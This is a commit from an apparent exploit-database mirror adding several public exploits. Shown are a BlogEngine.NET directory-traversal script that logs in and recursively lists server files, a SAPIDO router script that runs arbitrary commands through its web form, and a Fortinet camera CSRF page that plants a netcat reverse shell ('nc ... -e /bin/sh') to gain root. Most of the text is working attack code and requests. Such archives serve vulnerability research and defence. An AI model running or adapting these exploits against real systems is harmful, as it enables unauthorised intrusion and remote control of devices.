DB: 2019-06-26

7 changes to exploits/shellcodes SuperDoctor5 - 'NRPE' Remote Code Execution SAPIDO RB-1732 - Remote Command Execution Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution AZADMIN CMS 1.0 - SQL Injection BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal WordPress Plugin iLive 1.0.4 - Cross-Site Scripting WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting
radhanathdas · Jun 26, 2019 · a907366 · a907366
1 parent 97334ae
commit a907366
Show file tree

Hide file tree

Showing 8 changed files with 511 additions and 0 deletions.
diff --git a/exploits/aspx/webapps/47035.py b/exploits/aspx/webapps/47035.py
@@ -0,0 +1,183 @@
+# Exploit Title: Directory Traversal on BlogEngine.NET
+# Date: 24 Jun 2019
+# Exploit Author: Aaron Bishop
+# Vendor Homepage: https://blogengine.io/
+# Version: v3.3.7
+# Tested on: 3.3.7, 3.3.6
+# CVE : 2019-10717
+
+1. Description
+==============
+
+BlogEngine.NET is vulnerable to a directory traversal.  The page parameter, passed to /api/filemanager, reveals the contents of the directory.
+
+2. Proof of Concept
+=============
+
+Log in to the application and submit a GET request to /api/filemanager:
+
+Request:
+
+~~~
+GET /api/filemanager?path=/../../ HTTP/1.1
+Host: $RHOST
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: $COOKIE
+Connection: close
+Upgrade-Insecure-Requests: 1
+~~~
+
+Depending on how the request is submitted, the response may be XML or JSON
+
+XML Response
+
+~~~
+HTTP/1.1 200 OK
+Cache-Control: no-cache
+Pragma: no-cache
+Content-Type: application/xml; charset=utf-8
+Expires: -1
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+Date: Wed, 15 May 2019 01:58:46 GMT
+Connection: close
+Content-Length: 13030
+
+<ArrayOfFileInstance xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/BlogEngine.Core.FileSystem">
+<FileInstance>
+    <Created>5/14/2019 6:58:46 PM</Created>
+    <FileSize></FileSize>
+    <FileType>Directory</FileType>
+    <FullPath>~/App_Data/files/../..</FullPath>
+    <IsChecked>false</IsChecked>
+    <Name>...</Name>
+    <SortOrder>0</SortOrder>
+</FileInstance>
+...
+~~~
+
+JSON Response
+
+~~~
+HTTP/1.1 200 OK
+Cache-Control: no-cache
+Pragma: no-cache
+Content-Type: application/json; charset=utf-8
+Expires: -1
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+Date: Wed, 15 May 2019 02:35:13 GMT
+Connection: close
+Content-Length: 10011
+
+[
+    {
+        "IsChecked":false,
+        "SortOrder":0,
+        "Created":"5/14/2019 7:35:13 PM",
+        "Name":"...",
+        "FileSize":"",
+        "FileType":0,
+        "FullPath":"~/App_Data/files/../..",
+        "ImgPlaceholder":""
+    }
+...
+~~~
+
+import argparse
+import json
+import os
+import re
+import requests
+import sys
+
+"""
+Exploit for CVE-2019-10717
+
+CVE Identified by: Aaron Bishop
+Exploit written by: Aaron Bishop
+
+Outputs list of filenames found in web root
+
+python exploit.py -t $RHOST
+
+?path=/../..
+/../../archive.aspx
+/../../archive.aspx.cs
+/../../archive.aspx.designer.cs
+/../../BlogEngine.NET.csproj
+/../../BlogEngine.NET.csproj.user
+/../../contact.aspx
+/../../contact.aspx.cs
+/../../contact.aspx.designer.cs
+"""
+
+urls = {
+        "login": "/Account/login.aspx",
+        "traversal": "/api/filemanager"
+       }
+
+def make_request(session, method, target, data={}):
+    proxies = {
+            "http": "127.0.0.1:8080",
+            "https": "127.0.0.1:8080"
+              }
+    if method == 'GET':
+        r = requests.Request(method, target, params=data)
+    elif method == 'POST':
+        r = requests.Request(method, target, data=data)
+    prep = session.prepare_request(r)
+    resp = session.send(prep, verify=False, proxies=proxies)
+    return resp.text
+
+def login(session, host, user, passwd):
+    resp = make_request(session, 'GET', host+urls.get('login'))
+    login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
+    login_data = dict([(i[0],i[2]) for i in login_form])
+    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
+    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
+    resp = make_request(session, 'POST', host+urls.get('login'), login_data)
+
+def parse(body, path, outfile):
+    paths = json.loads(body)
+    new_paths = set()
+    for i in paths:
+        if i.get('FileType') == 0:
+            new_paths.add(i.get('FullPath'))
+        else:
+            outfile.write("{path}\n".format(path=i.get('FullPath')))
+    return new_paths
+
+def traverse(session, host, paths, outfile, visited=set()):
+    paths = set(paths) - visited
+    for path in paths:
+        print path
+        outfile.write("\n?path={path}\n".format(path=path))
+        visited.add(path)
+        resp = make_request(session, 'GET', host+urls.get('traversal'), data=dict(path=path))
+        new_paths = parse(resp, path, outfile)
+        if new_paths:
+            traverse(session, host, new_paths, outfile, visited)
+
+def main(host, user, passwd, root, outfile):
+    with requests.Session() as s:
+        login(s, host, user, passwd)
+        traverse(s, host, root, outfile)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10717 Path traversal')
+    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
+    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account on blog')
+    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
+    parser.add_argument('-r', '--root', nargs='+', default="/../..", help='Starting paths')
+    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
+    parser.add_argument('-o', '--outfile', type=argparse.FileType('w'), default='CVE-2019-10717.txt')
+    args = parser.parse_args()
+
+    protocol = "https://" if args.ssl else "http://"
+    if isinstance(args.root, str):
+        args.root = [args.root]
+    main(protocol + args.target, args.user, args.passwd, args.root, args.outfile)
diff --git a/exploits/hardware/remote/47031.py b/exploits/hardware/remote/47031.py
@@ -0,0 +1,22 @@
+# Exploit Title: SAPIDO RB-1732 command line execution
+# Date: 2019-6-24
+# Exploit Author: k1nm3n.aotoi
+# Vendor Homepage: http://www.sapido.com.tw/
+# Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin
+# Version: RB-1732 V2.0.43 
+# Tested on: linux
+
+
+import requests
+import sys
+
+def test_httpcommand(ip, command):
+   my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
+   r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)
+   content = r.text
+   content = content[
+     content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:
+     content.rfind('</textarea>')]
+   return content
+
+print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))
diff --git a/exploits/hardware/webapps/47033.html b/exploits/hardware/webapps/47033.html
@@ -0,0 +1,60 @@
+# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
+# Date: 2019-06-19
+# Exploit Author: @XORcat
+# Vendor Homepage: https://fortinet.com/
+# Software Link: Customer Account Required
+# Version: v1.2.0.0
+# Tested on: Linux
+# CVE : TBA
+
+<html>
+    <!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat) 
+
+Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/
+
+Follow the following steps to demonstrate this PoC:
+
+1. Replace IP addresses in Javascript code to repr	esent your testing
+   environment.
+2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
+   1337`
+3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
+   * Note: all modern browsers will cache Basic Authentication
+     credentials (such as those used by the FCM-MB40) even if the
+     FCM-MB40's administration page is closed.
+4. Open the crafted HTML document using the "admin" user's
+browser. 
+   * Note: In an attack scenario, this step would be performed by
+     implanting the code into a legitimate webpage that the "admin"
+     user visits, or by tricking the "admin" user into opening a page
+     which includes the code.
+5. Note that the `netcat` listener established in step 2. has received
+   a connection from the camera, and that it is presenting a `/bin/sh`
+   session as root.
+   * Note: type `id` in the `netcat` connection to verify this.
+
+_Note: After this issue has been exploited, the state of the system will
+have changed, and future exploitation attempts may require
+modification._
+-->
+    <head>
+        <script>
+const sleep = (milliseconds) => {
+    return new Promise(resolve => setTimeout(resolve, milliseconds))
+};
+var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
+var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';
+
+var sed_img = document.createElement("img");
+sed_img.src = sed_url;
+
+sleep(400).then(() => {
+    var execute_img = document.createElement("img");
+    execute_img.src = execute_url;
+});
+        </script>
+    </head>
+    <body>
+        <h1>Welcome to my non-malicious website.</h1>
+    </body>
+</html>